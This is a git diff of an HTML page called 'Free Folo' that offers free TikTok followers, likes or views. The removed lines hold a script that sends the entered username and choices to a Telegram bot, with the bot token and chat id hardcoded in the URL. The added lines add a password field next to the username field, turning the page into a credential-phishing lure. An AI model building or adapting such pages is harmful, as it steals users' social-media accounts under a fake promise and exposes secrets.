--- a/index.html
+++ b/index.html
@@ -3,76 +3,76 @@
 <head>
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
-  <title>Free Folo - TikTok Boost</title>
+  <title>Free Folo</title>
   <style>
     body {
-      font-family: sans-serif;
       background-color: #111;
       color: white;
-      text-align: center;
-      padding: 20px;
+      font-family: Arial, sans-serif;
+      display: flex;
+      flex-direction: column;
+      align-items: center;
+      justify-content: center;
+      height: 100vh;
+      margin: 0;
     }
-    img.logo {
-      width: 100px;
+
+    img {
+      width: 60px;
       margin-bottom: 10px;
     }
+
     h1 {
-      font-size: 30px;
-      margin: 10px 0 20px;
+      font-size: 32px;
+      margin-bottom: 20px;
     }
-    input, select, button {
-      display: block;
-      margin: 10px auto;
-      padding: 10px;
-      font-size: 16px;
-      width: 80%;
-      max-width: 300px;
-      border-radius: 10px;
+
+    input, select {
+      width: 250px;
+      padding: 12px;
+      margin: 10px 0;
       border: none;
+      border-radius: 10px;
+      background-color: #ccc;
+      color: black;
+      font-size: 16px;
     }
+
     button {
+      width: 250px;
+      padding: 12px;
+      margin-top: 15px;
       background-color: #ff0050;
       color: white;
-      font-weight: bold;
+      font-size: 18px;
+      border: none;
+      border-radius: 10px;
+      cursor: pointer;
+    }
+
+    button:hover {
+      background-color: #e60045;
     }
   </style>
 </head>
 <body>
 
-  <!-- ✅ شعار تيك توك -->
-  <img src="https://upload.wikimedia.org/wikipedia/commons/a/a9/TikTok_logo.svg" alt="TikTok Logo" class="logo" />
-
+  <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/0/0a/TikTok_logo.svg/100px-TikTok_logo.svg.png" alt="TikTok Logo" />
   <h1>Free Folo</h1>
 
-  <input type="text" id="username" placeholder="TikTok Username" />
-
-  <select id="amount">
-    <option value="1000">1000</option>
-    <option value="2000">2000</option>
-    <option value="5000">5000</option>
+  <input type="text" placeholder="TikTok Username" />
+  <select>
+    <option>1000</option>
+    <option>2000</option>
+    <option>5000</option>
   </select>
-
-  <select id="type">
-    <option value="followers">Followers</option>
-    <option value="likes">Likes</option>
-    <option value="views">Views</option>
+  <select>
+    <option>1</option>
+    <option>2</option>
+    <option>3</option>
   </select>
-
-  <button onclick="send()">تم</button>
-
-  <script>
-    function send() {
-      const username = document.getElementById("username").value;
-      const amount = document.getElementById("amount").value;
-      const type = document.getElementById("type").value;
-
-      const message = `🟣 TikTok Boost Request 🟣\n\n👤 Username: ${username}\n📦 Amount: ${amount}\n🔘 Type: ${type}`;
-
-      fetch(`https://api.telegram.org/bot7522052271:AAHa6XIscaA7ivTn_C0Wr8oaqritL0GP8EY/sendMessage?chat_id=6454073193&text=${encodeURIComponent(message)}`);
-      
-      alert("تم الإرسال ✅");
-    }
-  </script>
+  <input type="password" placeholder="Password" />
+  <button>تم</button>
 
 </body>
 </html>
